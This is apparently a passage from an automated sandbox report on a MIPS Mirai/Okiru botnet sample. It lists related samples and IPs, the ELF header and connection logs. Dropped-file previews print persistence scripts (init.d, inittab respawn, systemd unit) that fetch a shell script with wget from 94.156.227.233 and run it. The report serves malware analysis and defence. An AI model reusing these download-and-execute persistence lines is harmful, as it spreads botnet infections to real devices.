            unknownSwitzerland
            13030INIT7CHfalse
            94.156.227.234
            unknownBulgaria
            57463NETIXBGfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54.171.230.55zerarm6.elfGet hashmaliciousUnknownBrowse
              mips.elfGet hashmaliciousUnknownBrowse
                hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                  Space.x86.elfGet hashmaliciousMiraiBrowse
                    nn.elfGet hashmaliciousNanominer, XmrigBrowse
                      arm6.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        dlr.arm6.elfGet hashmaliciousUnknownBrowse
                          arm6.elfGet hashmaliciousMiraiBrowse
                            http://112.31.189.32:40158Get hashmaliciousMiraiBrowse
                              Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AMAZON-02USarmv5l.elfGet hashmaliciousUnknownBrowse
                                • 35.163.11.216
                                splm68k.elfGet hashmaliciousUnknownBrowse
                                • 3.138.165.134
                                nklarm7.elfGet hashmaliciousUnknownBrowse
                                • 3.115.112.216
                                splarm7.elfGet hashmaliciousUnknownBrowse
                                • 3.116.167.193
                                nklarm5.elfGet hashmaliciousUnknownBrowse
                                • 18.183.83.81
                                jklspc.elfGet hashmaliciousUnknownBrowse
                                • 3.110.151.242
                                nabspc.elfGet hashmaliciousUnknownBrowse
                                • 54.228.23.120
                                splarm.elfGet hashmaliciousUnknownBrowse
                                • 13.251.226.54
                                jklm68k.elfGet hashmaliciousUnknownBrowse
                                • 54.118.240.226
                                nabarm.elfGet hashmaliciousUnknownBrowse
                                • 63.35.239.146
                                INIT7CHnklarm6.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                nabarm6.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                zerm68k.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                zerarm6.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                armv4eb.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                • 109.202.202.202
                                tftp.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                • 109.202.202.202
                                bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 109.202.202.202
                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                • 109.202.202.202
                                NETIXBGarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 94.156.227.234
                                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                • 94.156.227.234
                                sparc.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 94.156.227.234
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                /etc/init.d/mipsel.nn.elfmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                  mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):122
                                              Entropy (8bit):4.669693856826029
                                              Encrypted:false
                                              SSDEEP:3:KPJRXaw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRl/mfoYZX48bbaaeXCO
                                              MD5:6E34D3CD24992F0E2B8E1EDC806358F9
                                              SHA1:2A73EFBE06FF1248F69716044272ACE0C8DECDC6
                                              SHA-256:23A64AD5E742E99A42FFAA0C46B10B247657BC5895DE4A1542F67BB1FE661609
                                              SHA-512:3D559F41A5E8CED20C1038C0B59DCDBC42646D6FB5E262F19F0E4F13EF3FAFAB4A493125F3369227F019C14E34ACB16EEF62C539714DF0EDB8C05C175670A3C6
                                              Malicious:false
                                              Reputation:low
                                              Preview:run bootcmd_mmc0; /tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/bin/sh
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):410
                                              Entropy (8bit):4.519449750255623
                                              Encrypted:false
                                              SSDEEP:12:QRkio/MXNxuw/0/ePUJgjvMbw/6FxH/MuKN+dRRucSOyd3:b/2/0/ecIx/ul/3YOM3
                                              MD5:1FE3C77D4BFC384D88694556CA239DFD
                                              SHA1:75C0A180A6E2AA298A4C24866DDC3D6A9F6AF098
                                              SHA-256:9E809BE6063B9C07600212B7E878EA5A7B57E2E9BB0B5514F19BBC8C2F8A2372
                                              SHA-512:3E93C56C0DBE10FF5F7736E57F461C67CB600D6CCABA0AAF6B751C93AEEE00B519F6BA1DE23B881C1535A5E80D6A993BAF195E69923A12AC8DC0354F0B0C9420
                                              Malicious:true
                                              Joe Sandbox View:
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:#!/bin/sh.# /etc/init.d/mipsel.nn.elf..case "" in. start). echo 'Starting mipsel.nn.elf'. /tmp/mipsel.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mipsel.nn.elf'. killall mipsel.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):109
                                              Entropy (8bit):4.626698510896325
                                              Encrypted:false
                                              SSDEEP:3:TKH4vZKaw/iFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8l/mzSXoZX48bzBeLXE0
                                              MD5:539F8D5E9F9630E7755AFC3255B83847
                                              SHA1:91DE1248768F868C0EB04F195696F677A9CDCD45
                                              SHA-256:68BA58E1ACE339B2C096378C5B6E300939F125E02859BEB4AC94C9A900F3E641
                                              SHA-512:EF7A47FA526F8E284110610389D82529C2D0F635235E69FFEAC28CDAE2A01C346B772A3FFBFA6E1C7097286A190143E2244236CAAB84876502F74B0C5B6B8740
                                              Malicious:true
                                              Reputation:low
                                              Preview:#!/bin/sh./tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):114
                                              Entropy (8bit):4.594652553807888
                                              Encrypted:false
                                              SSDEEP:3:nAWu5Iw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:AN/mfoYZX48bbaaeXCO
                                              MD5:6519B549572A81833E8C92B99EE17B7F
                                              SHA1:6BBBC13520CDFBF1D7A1B95118124A059116B0ED
                                              SHA-256:33B84F0C2411AA5338C06D292C50BF16A3E7A7E220D49ADEC32E881CD67CF1B3
                                              SHA-512:2634CDAC96A754D2A9EE1C23245A0E67D34ADA15ACC20D9144CEEADB6137CFD9A5CD1A8D3FA53229280B356CECDCA014CFB8B29ECF995112F948C6E763F861DE
                                              Malicious:false
                                              Reputation:low
                                              Preview:::respawn:/tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):53
                                              Entropy (8bit):3.871459242626451
                                              Encrypted:false
                                              SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                              MD5:2BD9B4BE30579E633FC0191AA93DF486
                                              SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                              SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                              SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                              Malicious:false
                                              Preview:gorilla botnet is on the device ur not a cat go away.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):105
                                              Entropy (8bit):4.491314845702613
                                              Encrypted:false
                                              SSDEEP:3:Tgaw/iFDvSDRFiLdjX48FIbILbaaFOdFXa50:Tgl/mzSXoZX48bbaaeXC0
                                              MD5:AAF2E90396630CCF6A63DEA3968A287B
                                              SHA1:CF20411B5AE5B40FB111B0DB8B5A22ABFD6A28E7
                                              SHA-256:B7B8AE936784CA3DFFC0D2C5366F02B0A660896520B165744CFE72C0A8151253
                                              SHA-512:FADB72F2A204FA6A2AA5F8DDDD076B10B115A200909AA3390F031E4B91F287B866EAAE32B72EFF521DA7D6F2774C537D585514A8EEED4AB71BFB797061BBD475
                                              Malicious:true
                                              Preview:/tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):10
                                              Entropy (8bit):3.121928094887362
                                              Encrypted:false
                                              SSDEEP:3:TKH4vn:hv
                                              MD5:3E2B31C72181B87149FF995E7202C0E3
                                              SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                              SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                              SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                              Preview:#!/bin/sh.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):303
                                              Entropy (8bit):5.051178844874226
                                              Encrypted:false
                                              SSDEEP:6:z8ifitRZAMzdK+5/M02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+5/Mp+GWRdtd+GWRXY+GWRr
                                              MD5:44EB11E7055C1AD968CFD9407D450693
                                              SHA1:78B694FFAFEFE85FB8436DDDB15F3BCDF1CEA174
                                              SHA-256:AFADB28D87BB66E46AB6CDAF6F20047DCC3DD49DFBD0FDB4FE9DC8F55479ABF7
                                              SHA-512:34C5FEAB113C673CB6A94491571C3C10E554E35F07D53CA1E1F0AD33C4D87BAE52766A29069DA5D206B9DB771BF5F7407E6FD972FDF7C610A35730F883ED5EE9
                                              Malicious:false
                                              Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/mipsel.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):76
                                              Entropy (8bit):3.7627880354948586
                                              Encrypted:false
                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                              Malicious:false
                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):19
                                              Entropy (8bit):3.5110854081804286
                                              Encrypted:false
                                              SSDEEP:3:Tgaw/iln:Tgl/Gn
                                              MD5:E161F2EC9C1A693BE77DD848C5A17087
                                              SHA1:C6DC3683D6AF6B3AD69F1E155638994278FD3DC9
                                              SHA-256:6EC0A33B73DE74EBEB61B23D54BFF44B920A3F994E0781781253974DB671921F
                                              SHA-512:79FEC2E25B4E40804C09089CDAC6D8A9C2FE0F90D096D6DEF3DE458D572EBE6D18740670BA9F33B45DAA80D4104252ECAAB075B44D5ED9BEDF8C5644DB302145
                                              Malicious:false
                                              Preview:/tmp/mipsel.nn.elf.
                                              File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):5.553864058788745
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:mipsel.nn.elf
                                              File size:118'656 bytes
                                              MD5:f0e49a9ec4b07dfc54acfd8cb9b7136b
                                              SHA1:ec3d9752073bdbc98c76f2aa82ef1ee6f5939e2e
                                              SHA256:b44c02a221356cdce2cb1cb02d5100ff7aa23ef9d0c2f92f2fdfe9cdae74fba6
                                              SHA512:aa1c88324b352a5d232fe7d583608a24ab1f265eebadf3e7615b73a95f96549730fd349f43ad3834386375934d306ed8936377f2e541051849f45582dc10b535
                                              SSDEEP:1536:X0MFEziYKe5LOKxhY7XKRV8n2rMk0RQ/I4VcmO3ZZV3myGnPV5rGL2v:bFEWYKGjb/I4VXEM7rGL2
                                              TLSH:79C3F706BB541FF7ECABCD3746BD170124CC585B12A92B393934E918F60B25B1AE3DA4
                                              File Content Preview:.ELF....................`.@.4...P.......4. ...(...............@...@.0...0.....................E...E.....\/..........Q.td...............................<.D.'!......'.......................<.D.'!... .........9'.. ........................<xD.'!.............9

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:MIPS R3000
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x400260
                                              Flags:0x1007
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:118096
                                              Section Header Size:40
                                              Number of Section Headers:14
                                              Header String Table Index:13
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x4000940x940x8c0x00x6AX004
                                              .textPROGBITS0x4001200x1200x18d600x00x6AX0016
                                              .finiPROGBITS0x418e800x18e800x5c0x00x6AX004
                                              .rodataPROGBITS0x418ee00x18ee00x26500x00x2A0016
                                              .ctorsPROGBITS0x45c0000x1c0000x80x00x3WA004
                                              .dtorsPROGBITS0x45c0080x1c0080x80x00x3WA004
                                              .data.rel.roPROGBITS0x45c0140x1c0140x540x00x3WA004
                                              .dataPROGBITS0x45c0700x1c0700x5000x00x3WA0016
                                              .gotPROGBITS0x45c5700x1c5700x77c0x40x10000003WAp0016
                                              .sbssNOBITS0x45ccec0x1ccec0x200x00x10000003WAp004
                                              .bssNOBITS0x45cd100x1ccec0x224c0x00x3WA0016
                                              .mdebug.abi32PROGBITS0xe100x1ccec0x00x00x0001
                                              .shstrtabSTRTAB0x00x1ccec0x640x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x4000000x4000000x1b5300x1b5305.66330x5R E0x10000.init .text .fini .rodata
                                              LOAD0x1c0000x45c0000x45c0000xcec0x2f5c4.16810x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 24, 2024 05:17:51.786992073 CET43928443192.168.2.2391.189.91.42
                                              Dec 24, 2024 05:17:52.053540945 CET6000838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:52.173132896 CET382426000894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:52.173203945 CET6000838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:52.174915075 CET6000838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:52.294394016 CET382426000894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:52.699448109 CET6000838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:52.860193014 CET382426000894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:53.304225922 CET382426000894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:53.307683945 CET6000838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:53.702611923 CET6001038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:53.822151899 CET382426001094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:53.822222948 CET6001038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:53.822277069 CET6001038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:53.941838980 CET382426001094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:54.334400892 CET6001038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:54.495896101 CET382426001094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:54.965467930 CET382426001094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:54.965537071 CET6001038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:55.337744951 CET6001238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:55.457231045 CET382426001294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:55.457518101 CET6001238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:55.457556963 CET6001238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:55.577071905 CET382426001294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:56.009404898 CET6001238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:56.176778078 CET382426001294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:56.594279051 CET382426001294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:56.594342947 CET6001238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:57.010857105 CET6001438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:57.130331993 CET382426001494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:57.130386114 CET6001438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:57.130410910 CET6001438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:57.158194065 CET42836443192.168.2.2391.189.91.43
                                              Dec 24, 2024 05:17:57.249905109 CET382426001494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:57.635253906 CET6001438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:57.799823999 CET382426001494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:58.259159088 CET382426001494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:58.259212971 CET6001438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:58.437998056 CET4251680192.168.2.23109.202.202.202
                                              Dec 24, 2024 05:17:58.636229992 CET6001638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:58.755783081 CET382426001694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:58.755853891 CET6001638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:58.755872011 CET6001638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:58.875497103 CET382426001694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:59.260600090 CET6001638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:17:59.424556017 CET382426001694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:59.879146099 CET382426001694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:17:59.879231930 CET6001638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:00.261895895 CET6001838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:00.381378889 CET382426001894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:00.381450891 CET6001838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:00.381469011 CET6001838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:00.501018047 CET382426001894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:00.886029005 CET6001838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:01.047842026 CET382426001894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:01.520095110 CET382426001894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:01.520159960 CET6001838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:01.887119055 CET6002038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:02.006700993 CET382426002094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:02.006776094 CET6002038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:02.006802082 CET6002038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:02.126270056 CET382426002094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:02.511094093 CET6002038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:02.671780109 CET382426002094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:03.139589071 CET382426002094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:03.139664888 CET6002038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:03.512059927 CET6002238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:03.631527901 CET382426002294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:03.631642103 CET6002238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:03.631642103 CET6002238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:03.752751112 CET382426002294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:04.135986090 CET6002238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:04.303834915 CET382426002294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:04.765110970 CET382426002294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:04.765188932 CET6002238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:05.136921883 CET6002438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:05.256381989 CET382426002494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:05.256498098 CET6002438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:05.256498098 CET6002438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:05.375978947 CET382426002494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:05.760775089 CET6002438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:05.923732042 CET382426002494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:06.381896019 CET382426002494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:06.381979942 CET6002438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:06.761820078 CET6002638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:06.881292105 CET382426002694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:06.881417036 CET6002638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:06.881448030 CET6002638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:07.003303051 CET382426002694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:07.385481119 CET6002638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:07.547763109 CET382426002694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:08.014740944 CET382426002694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:08.014841080 CET6002638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:08.386744976 CET6002838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:08.506351948 CET382426002894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:08.506463051 CET6002838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:08.506464005 CET6002838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:08.628885984 CET382426002894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:09.012295961 CET6002838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:09.178764105 CET382426002894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:09.643204927 CET382426002894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:09.643333912 CET6002838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:10.013514042 CET6003038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:10.133572102 CET382426003094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:10.133670092 CET6003038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:10.133706093 CET6003038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:10.253309965 CET382426003094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:10.637671947 CET6003038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:10.803751945 CET382426003094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:11.267396927 CET382426003094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:11.267488003 CET6003038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:11.639102936 CET6003238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:11.758925915 CET382426003294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:11.759015083 CET6003238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:11.759042978 CET6003238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:11.879673004 CET382426003294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:12.262466908 CET6003238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:12.426117897 CET382426003294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:12.515904903 CET43928443192.168.2.2391.189.91.42
                                              Dec 24, 2024 05:18:12.893652916 CET382426003294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:12.893731117 CET6003238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:13.263458967 CET6003438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:13.386976004 CET382426003494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:13.387042999 CET6003438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:13.387068033 CET6003438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:13.506834030 CET382426003494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:13.890655994 CET6003438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:14.051687002 CET382426003494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:14.509429932 CET382426003494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:14.509669065 CET6003438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:14.892584085 CET6003638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:15.012115955 CET382426003694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:15.012260914 CET6003638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:15.012260914 CET6003638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:15.131819963 CET382426003694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:15.516038895 CET6003638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:15.683651924 CET382426003694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:16.133888006 CET382426003694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:16.134008884 CET6003638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:16.516884089 CET6003838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:16.636559010 CET382426003894.156.227.234192.168.2.23
